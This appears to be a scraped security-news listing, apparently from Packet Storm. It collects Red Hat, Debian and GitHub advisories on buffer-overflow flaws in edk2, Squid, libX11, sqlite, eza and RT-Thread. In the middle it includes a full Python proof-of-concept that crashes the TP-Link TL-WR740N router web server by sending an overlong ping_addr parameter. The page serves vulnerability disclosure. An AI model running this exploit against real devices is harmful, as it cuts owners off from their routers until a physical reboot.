Red Hat Security Advisory 2024-1305-03 - An update for edk2 is now available for Red Hat Enterprise Linux 8.4 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.4 Update Services for SAP Solutions, and Red Hat Enterprise Linux 8.4 Telecommunications Update Service. Issues addressed include a buffer overflow vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1305.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: edk2 security updateAdvisory ID:        RHSA-2024:1305-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:1305Issue date:         2024-03-13Revision:           03CVE Names:          CVE-2023-45234====================================================================Summary: An update for edk2 is now available for Red Hat Enterprise Linux 8.4 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.4 Update Services for SAP Solutions, and Red Hat Enterprise Linux 8.4 Telecommunications Update Service.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:EDK (Embedded Development Kit) is a project to enable UEFI support for VirtualMachines. This package contains a sample 64-bit UEFI firmware for QEMU and KVM.Security Fix(es):* edk2: Buffer overflow when processing DNS Servers option in a DHCPv6 Advertise message (CVE-2023-45234)Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-45234References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2258697

Red Hat Security Advisory 2024-1305-03

There exists a buffer overflow vulnerability in the TP-Link TL-WR740 router that can allow an attacker to crash the web server running on the router by sending a crafted request.

    # Exploit Title: TP-Link TL-WR740N - Buffer Overflow 'DOS'# Date: 8/12/2023# Exploit Author: Anish Feroz (ZEROXINN)# Vendor Homepage: http://www.tp-link.com# Version: TP-Link TL-WR740n 3.12.11 Build 110915 Rel.40896n# Tested on: TP-Link TL-WR740N#Description:#There exist a buffer overflow vulnerability in TP-Link TL-WR740 router that can allow an attacker to crash the web server running on the router by sending a crafted request. To bring back the http (webserver), a user must physically reboot the router.#Usage:#python3 target username password#change port, if required------------------------------------------------POC-----------------------------------------#!/usr/bin/pythonimport requestsfrom requests.auth import HTTPBasicAuthimport base64def send_request(ip, username, password):    auth_url = f"http://{ip}:8082"    target_url = f"http://{ip}:8082/userRpm/PingIframeRpm.htm?ping_addr=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&doType=ping&isNew=new&sendNum=4&pSize=64&overTime=800&trHops=20"    credentials = f"{username}:{password}"    encoded_credentials = base64.b64encode(credentials.encode()).decode()    headers = {        "Host": f"{ip}:8082",        "Authorization": f"Basic {encoded_credentials}",        "Upgrade-Insecure-Requests": "1",        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36",        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",        "Referer": f"http://{ip}:8082/userRpm/DiagnosticRpm.htm",        "Accept-Encoding": "gzip, deflate",        "Accept-Language": "en-US,en;q=0.9",        "Connection": "close"    }    session = requests.Session()        response = session.get(target_url, headers=headers)    if response.status_code == 200:        print("Server Crashed")        print(response.text)    else:        print(f"Script Completed with status code {response.status_code}")ip_address = input("Enter IP address of the host: ")username = input("Enter username: ")password = input("Enter password: ")send_request(ip_address, username, password)

TP-Link TL-WR740N Buffer Overflow / Denial Of Service

Debian Linux Security Advisory 5637-1 - Several security vulnerabilities have been discovered in Squid, a full featured web proxy cache. Due to programming errors in Squid's HTTP request parsing, remote attackers may be able to execute a denial of service attack by sending large X-Forwarded-For header or trigger a stack buffer overflow while performing HTTP Digest authentication. Other issues facilitate request smuggling past a firewall or a denial of service against Squid's Helper process management.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5637-1                   security@debian.org  
https://www.debian.org/security/                          Markus Koschany  
March 08, 2024                        https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : squid  
CVE ID         : CVE-2023-46724 CVE-2023-46846 CVE-2023-46847 CVE-2023-49285  
                 CVE-2023-49286 CVE-2023-50269 CVE-2024-23638 CVE-2024-25617  
                 CVE-2023-46848 CVE-2024-25111  
Debian Bug     : 1055252 1054537 1055250 1055251 1058721

Several security vulnerabilities have been discovered in Squid, a full featured  
web proxy cache. Due to programming errors in Squid's HTTP request parsing,  
remote attackers may be able to execute a denial of service attack by sending  
large X-Forwarded-For header or trigger a stack buffer overflow while  
performing HTTP Digest authentication. Other issues facilitate request  
smuggling past a firewall or a denial of service against Squid's Helper process  
management.

In regard to CVE-2023-46728: Please note that support for the Gopher protocol  
has simply been removed in future Squid versions. There are no plans by the  
upstream developers of Squid to fix this issue. We recommend to reject all  
Gopher URL requests instead.

For the oldstable distribution (bullseye), these problems have been fixed  
in version 4.13-10+deb11u3.

For the stable distribution (bookworm), these problems have been fixed in  
version 5.7-2+deb12u1.

We recommend that you upgrade your squid packages.

For the detailed security status of squid please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/squid

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEErPPQiO8y7e9qGoNf2a0UuVE7UeQFAmXrHBNfFIAAAAAALgAo  
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEFD  
RjNEMDg4RUYzMkVERUY2QTFBODM1RkQ5QUQxNEI5NTEzQjUxRTQACgkQ2a0UuVE7  
UeSFng/+JAY5jG6Z/fVFf2M9SsqFhQm8mGT1CgOx39dYirUkdpcFOyADqWopwv+q  
tci90QFuhnreW1DmO1GYRlZro+37iRjiryRKxETpUB1AnpPWs6RnyAA+mrqssDqg  
PxxFkqpJFtpMhZU3VkDDbTkkvK2T0Hwjdn8TND6qA+B56exwW2DEZlm5aqCPiWRf  
pdzPZTOZJEV2fT4UPWduiIN1l94VsLktfZY5Ox0/HmrdkAWJJFXQhj3wZPcbFLbB  
leQ7Nkq6mpuw98UxOSa7hsE0crPm6ctrf7AYMx+qojtWJFcbFE+mUqzcf0aFYp0L  
EfTSVAOVEXvbFytlX/oSWYE5GrZtTrnwProiXFJT7WvDYN2Mbqxgp/jB3jZygmrZ  
rknvF84haHX16ZMXRlBDOlx1E3XSCB+/xRynwbGQe8RPzSRlOKuiFqn+qr3qCtOd  
5Ua2+ZJXDpEP4aUseFb94FwJRfs9onBS+EYPt2xwcxcBGUiMJ/lY9Fj9p5MjQ1bZ  
nCXuRNo2ao6qumLSraK2qPle7AucbuOtiMDsMFi6rGu3H0RVlk7oWGFO4rMRAcvX  
IBYU2bWBIyi7J4IvJd+07QfNgofPvcld9XN7/LDgizmMZpCorpPq39Ta24y7U3e5  
Zv+ye/kOYKuD0ij7M7jkT2hgxq6kKdlSEZbZ/wrlkSILrcjgwqw=  
=qmZY  
-----END PGP SIGNATURE-----

Debian Security Advisory 5637-1

## Duplicate Advisory
This advisory has been withdrawn because it is a duplicate of GHSA-3qx3-6hxr-j2ch. This link is maintained to preserve external references.

## Original Description
Buffer Overflow vulnerability in eza before version 0.18.2, allows local attackers to execute arbitrary code via the .git/HEAD, .git/refs, and .git/objects components.

Skip to content

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

1.  GitHub Advisory Database
2.  GitHub Reviewed
3.  GHSA-3xc6-7h59-j2x4

**Duplicate Advisory: eza Potential Heap Overflow Vulnerability for AArch64**

Moderate severity GitHub Reviewed Published Mar 6, 2024 to the GitHub Advisory Database • Updated Mar 6, 2024

Withdrawn This advisory was withdrawn on Mar 6, 2024

**Package**

**Affected versions**

< 0.18.2

**Description**

Published by the National Vulnerability Database

Mar 6, 2024

Published to the GitHub Advisory Database

Mar 6, 2024

GHSA-3xc6-7h59-j2x4: Duplicate Advisory: eza Potential Heap Overflow Vulnerability for AArch64

RT-Thread RTOS versions 5.0.2 and below suffer from multiple buffer overflows, a weak random source in rt_random driver, and various other vulnerabilities.

RT-Thread RTOS 5.0.2 Overflows / Weak Random Source

Red Hat Security Advisory 2024-1088-03 - An update for libX11 is now available for Red Hat Enterprise Linux 9.2 Extended Update Support. Issues addressed include a buffer overflow vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1088.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: libX11 security updateAdvisory ID:        RHSA-2024:1088-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:1088Issue date:         2024-03-05Revision:           03CVE Names:          CVE-2023-3138====================================================================Summary: An update for libX11 is now available for Red Hat Enterprise Linux 9.2 Extended Update Support.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The libX11 packages contain the core X11 protocol client library.Security Fix(es):* libX11: InitExt.c can overwrite unintended portions of the Display structure if the extension request leads to a buffer overflow (CVE-2023-3138)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-3138References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2213748

Red Hat Security Advisory 2024-1088-03

Red Hat Security Advisory 2024-1081-03 - An update for sqlite is now available for Red Hat Enterprise Linux 9.2 Extended Update Support. Issues addressed include a buffer overflow vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1081.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: sqlite security updateAdvisory ID:        RHSA-2024:1081-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:1081Issue date:         2024-03-05Revision:           03CVE Names:          CVE-2023-7104====================================================================Summary: An update for sqlite is now available for Red Hat Enterprise Linux 9.2 Extended Update Support.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:SQLite is a C library that implements an SQL database engine. A large subset of SQL92 is supported. A complete database is stored in a single disk file. The API is designed for convenience and ease of use. Applications that link against SQLite can enjoy the power and flexibility of an SQL database without the administrative hassles of supporting a separate database server.Security Fix(es):* sqlite: heap-buffer-overflow at sessionfuzz (CVE-2023-7104)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-7104References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2256194

Red Hat Security Advisory 2024-1081-03

Red Hat Security Advisory 2024-1077-03 - An update for edk2 is now available for Red Hat Enterprise Linux 9.0 Extended Update Support. Issues addressed include a buffer overflow vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1077.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: edk2 security updateAdvisory ID:        RHSA-2024:1077-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:1077Issue date:         2024-03-05Revision:           03CVE Names:          CVE-2023-45230====================================================================Summary: An update for edk2 is now available for Red Hat Enterprise Linux 9.0 Extended Update Support.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:EDK (Embedded Development Kit) is a project to enable UEFI support for Virtual Machines. This package contains a sample 64-bit UEFI firmware for QEMU and KVM. Security Fix(es):* edk2: Buffer overflow in the DHCPv6 client via a long Server ID option (CVE-2023-45230)* edk2: Buffer overflow when processing DNS Servers option in a DHCPv6 Advertise message (CVE-2023-45234)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-45230References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2258685https://bugzilla.redhat.com/show_bug.cgi?id=2258697

Red Hat Security Advisory 2024-1077-03

Red Hat Security Advisory 2024-1076-03 - An update for edk2 is now available for Red Hat Enterprise Linux 9.2 Extended Update Support. Issues addressed include a buffer overflow vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1076.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: edk2 security updateAdvisory ID:        RHSA-2024:1076-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:1076Issue date:         2024-03-05Revision:           03CVE Names:          CVE-2023-45230====================================================================Summary: An update for edk2 is now available for Red Hat Enterprise Linux 9.2 Extended Update Support.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:EDK (Embedded Development Kit) is a project to enable UEFI support for Virtual Machines. This package contains a sample 64-bit UEFI firmware for QEMU and KVM. Security Fix(es):* edk2: Buffer overflow in the DHCPv6 client via a long Server ID option (CVE-2023-45230)* edk2: Buffer overflow when processing DNS Servers option in a DHCPv6 Advertise message (CVE-2023-45234)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-45230References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2258685https://bugzilla.redhat.com/show_bug.cgi?id=2258697

Red Hat Security Advisory 2024-1076-03

Red Hat Security Advisory 2024-1075-03 - An update for edk2 is now available for Red Hat Enterprise Linux 9. Issues addressed include a buffer overflow vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1075.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: edk2 security updateAdvisory ID:        RHSA-2024:1075-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:1075Issue date:         2024-03-05Revision:           03CVE Names:          CVE-2023-45230====================================================================Summary: An update for edk2 is now available for Red Hat Enterprise Linux 9.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:EDK (Embedded Development Kit) is a project to enable UEFI support for Virtual Machines. This package contains a sample 64-bit UEFI firmware for QEMU and KVM. Security Fix(es):* edk2: Buffer overflow in the DHCPv6 client via a long Server ID option (CVE-2023-45230)* edk2: Buffer overflow when processing DNS Servers option in a DHCPv6 Advertise message (CVE-2023-45234)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-45230References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2258685https://bugzilla.redhat.com/show_bug.cgi?id=2258697

Tag

#buffer_overflow